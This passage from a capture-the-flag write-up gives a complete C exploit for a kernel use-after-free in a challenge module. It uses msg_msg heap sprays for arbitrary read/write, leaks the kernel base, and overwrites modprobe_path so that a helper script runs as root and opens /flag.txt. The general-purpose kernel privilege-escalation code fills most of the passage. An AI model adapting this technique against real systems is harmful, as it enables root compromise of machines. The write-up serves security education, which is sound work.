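    return write_executable(dummy_path, magic, sizeof(magic));
}
```

Once modprobe_path points at the helper, executing the dummy file is what makes the kernel run it.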

Overwriting modprobe_path

We can add an arbitrary_write function to the exploit code that uses the arbitrary_primitive function to perform the msg_msg heap spray. Both primitives use the spray to position the target address. The read primitive then uses the 0xcafebabe ioctl to copy data out of that address, while the write primitive uses the 0xbabecafe ioctl to write data from the request buffer into it. If all goes well, the address written to will be the global variable modprobe_path.

This was the final exploit:

Final Exploit
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
 
 
#define CHUNK_SIZE 0x100
#define MSG_SIZE (CHUNK_SIZE / 2 - 48) // msg_msg has a 48 byte header
#define MSG_SPRAY_SIZE 0x10
 
#define MODPROB_PATH_OFFSET 0x1851400
#define SYSFS_FILE_KFOPS_RW_OFFSET 0x1227720
 
#define IOCTL_DESTROY 0x1337
#define IOCTL_ALLOC 0xdeadbeef
#define IOCTL_READ 0xcafebabe
#define IOCTL_EDIT 0xbabecafe
 
// #define DEBUG
 
#if defined DEBUG
#define LOG(fmt, ...)    printf(fmt, __VA_ARGS__);
#else
#define LOG(fmt, ...)    /* empty when debugging disabled */
#endif
 
// global variable so it can be accessed by all the functions
int module_fp;
int msqid_array[MSG_SPRAY_SIZE];
 
 
typedef struct request{
    int idx;
    char buffer[CHUNK_SIZE];
} request;


// https://elixir.bootlin.com/linux/v4.19.98/source/include/linux/msg.h#L9
typedef struct msg_msg_struct {
    long mtype;
    char mtext[MSG_SIZE];
} msg_msg_struct;
 
 
void free_blockchain()
{
    struct request request_struct;
    request_struct.idx = '\x00';
 
    LOG("%s Freeing blockchain\n", "[DEBUG]");
    long ioctl_return = ioctl(module_fp, IOCTL_DESTROY,&request_struct);
    if ( ioctl_return < 0 )
    {
        printf("[CRITICAL] Something went wrong freeing blockchain\n");
        exit(1);
    }
 
}
 
void create_timer()
{
    // per https://www.willsroot.io/2020/10/cuctf-2020-hotrod-kernel-writeup.html
    struct itimerspec timespec = {{10, 0}, {10, 0}};
 
    int tfd = timerfd_create(CLOCK_REALTIME, 0);
    timerfd_settime(tfd, 0, &timespec, 0);
}
 
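int alloc(char *buffer){
    struct request request_struct;
    request_struct.idx = 0;

    /* Zero the buffer and copy at most CHUNK_SIZE - 1 bytes, so short string
       arguments such as "FOOBAR" are not read past their end. */
    memset(request_struct.buffer, 0, CHUNK_SIZE);
    strncpy(request_struct.buffer, buffer, CHUNK_SIZE - 1);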
    long ioctl_return = ioctl(module_fp, IOCTL_ALLOC,&request_struct);
    if ( ioctl_return < 0 )
    {
        printf("[CRITICAL] Something went wrong allocating chunk. Got chunk index %ld\n\n", ioctl_return);
        exit(1);
    }
    else
        LOG("%s allocating chunk. Got return code %ld\n\n", "[DEBUG]", ioctl_return);
 
    return ioctl_return;
}
 
char *read_chunk(long idx)
{
    struct request request_struct;
    request_struct.idx = idx;
 
    long ioctl_return = ioctl(module_fp, IOCTL_READ,&request_struct);
    char* return_data = (char*) malloc(CHUNK_SIZE);
 
 
    // printf("(read) ioctl: return code was %ld\n", ioctl_return);
 
    memcpy(return_data, request_struct.buffer, CHUNK_SIZE);
    for(int i = 0; i < 0x100 / 8; i++){
        LOG("%s Read data from chunk %ld position %d: %p\n", "[DEBUG]", idx, i, ((void **)request_struct.buffer)[i]);
    }
    printf("\n\n");
    return return_data;
}
 
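void write_chunk(int idx, char * value){
    struct request request_struct;
    request_struct.idx = idx;

    /* Zero the buffer and copy the NUL-terminated value, so a short string
       such as "/tmp/xxxx" is not read past its end. */
    memset(request_struct.buffer, 0, sizeof(request_struct.buffer));
    strncpy(request_struct.buffer, value, sizeof(request_struct.buffer) - 1);
    ioctl(module_fp, IOCTL_EDIT,&request_struct);
}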
 
void spray_msg_msg(char *buffer)
{
    struct msg_msg_struct msg;
    msg.mtype = 1;
    memcpy(msg.mtext, buffer, MSG_SIZE);
    msg.mtext[MSG_SIZE - 1] = 0;
 
    puts("[INFO] Spraying msg_msg struct into kernel heap");
    for(int i = 0; i < MSG_SPRAY_SIZE; i ++)
    {
        msqid_array[i] = msgget(IPC_PRIVATE, 0644  | IPC_CREAT);
        msgsnd(msqid_array[i], &msg, sizeof(msg.mtext), 0);
    }
}
 
unsigned long long leak_heap(){
    int i;
 
    // Prepare structure per https://xkaneiki-github-io.translate.goog/2021/06/07/kernel-heap-spray/?_x_tr_sl=fr&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp
 
    char cruff_buf[MSG_SIZE];
    memset(cruff_buf, 0, MSG_SIZE);
    spray_msg_msg(cruff_buf);
 
    alloc("FOOBAR");
 
    puts("[INFO] Freeing msg_msg chunks from kernel heap");
 
    msg_msg_struct msg;
    for(i = 0; i < MSG_SPRAY_SIZE; i ++){
        if(msgrcv(msqid_array[i], &msg, sizeof(msg.mtext), 1, IPC_NOWAIT ) < 0)
        {
            puts("[CRITICAL] msgrcv failed");
            exit(1);
        }
 
        if(((long long*)msg.mtext)[8] != 0){
            return ((long long*)msg.mtext)[8];
        }
    }
 
    puts("[CRITICAL] No leak found! Exiting");
    exit(1);
}
 
 
unsigned long long *arbitrary_primitive(unsigned long long *payload, unsigned long long addr)
{
 
    payload[8] = addr - 8;
 
    spray_msg_msg((char *)payload);
    return payload;
}
 
void arbitrary_read(unsigned long long addr, unsigned long long *leaks){
    unsigned long long payload[0x100] = {0}; /* zeroed so the spray carries no stack garbage */

    arbitrary_primitive(payload, addr);

    char *data = read_chunk(0);
    memcpy(leaks, data, 0x100);
    free(data); /* read_chunk returns a malloc'd copy */
}


void arbitrary_write(unsigned long long addr, char * value){
    unsigned long long payload[0x100] = {0};

    arbitrary_primitive(payload, addr);
    write_chunk(0, value);
}
 
 
int main(int argc, char *argv[])
{
    unsigned long long leaks[0x100 / 8];

    module_fp = open("/dev/Sofire", O_RDONLY);
    if (module_fp < 0) {
        perror("[CRITICAL] open /dev/Sofire");
        return 1;
    }
 
    system("echo -e '#!/bin/sh\nchmod 777 /flag.txt\n' > /tmp/xxxx && chmod +x /tmp/xxxx");
    system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/dummy && chmod +x /tmp/dummy");
 
    // spray the timers around the chunk that will (hopefully) be used for the blockchain chunk
    // and contain pointers usable to leak the kernel unlike msg msg
 
    alloc("\x00");
 
 
    free_blockchain();
 
 
    unsigned long long heap_leak = leak_heap();
    printf("[SUCCESS] Kernel heap leak: 0x%llx\n", heap_leak);
 
 
    arbitrary_read(heap_leak + 0xcc0, leaks);
 
    printf("[SUCCESS] Leaked sysfs_file_kfops_rw: 0x%llx\n", leaks[0]);
 
    unsigned long long kernel_base = leaks[0] - SYSFS_FILE_KFOPS_RW_OFFSET;
    unsigned long long modprobe_address = kernel_base + MODPROB_PATH_OFFSET;
 
    printf("[+] Calculated the kernel base: 0x%llx\n", kernel_base);
    printf("[+] Calculated address of modprob_path: 0x%llx\n", modprobe_address);
 
 
    free_blockchain();
    arbitrary_write(modprobe_address, "/tmp/xxxx");
 
    system("/tmp/dummy"); // trigger call to modprob_path
    system("ls -la /flag.txt");
    system("cat /flag.txt");
    return 0;
 
}

This works about 1 in every 4 attempts.

[Figure: Exploit on non-KASLR system]

To update the exploit for KASLR, all that was required was changing the offset to sysfs_file_kfops_rw from 0xcc0 to 0xc40 in the arbitrary_read call in main. We got the flag! Interestingly, the exploit is significantly more reliable on the KASLR-enabled VM.

[Figure: Exploit on KASLR system]

Wrapping Up

I really enjoyed the challenge. There were a number of times I hit dead ends, such as attempting to spray timerfd_ctx structs into the heap before having to switch tack. I had hoped it would be possible to actually hijack control flow inside the kernel; alas, that will need to wait for another day.

To summarise

  • The challenge was a heap based kernel pwn, focussed on exploiting a UAF vulnerability in the kernel module
  • msg_msg objects allowed for the creation of arbitrary read/write primitives, providing an attack path to leak the kheap and .text sections of the kernel, and then overwrite the modprobe_path global variable to execute arbitrary code when an unknown filetype is executed.

If I get the time, I will take more of a look at the following:

  • The timerfd_ctx spray, and how it could have been used to leak the kernel, and potentially the heap
  • Utilising the arbitrary write to hijack control flow in the kernel, perhaps using heap objects to KROP

References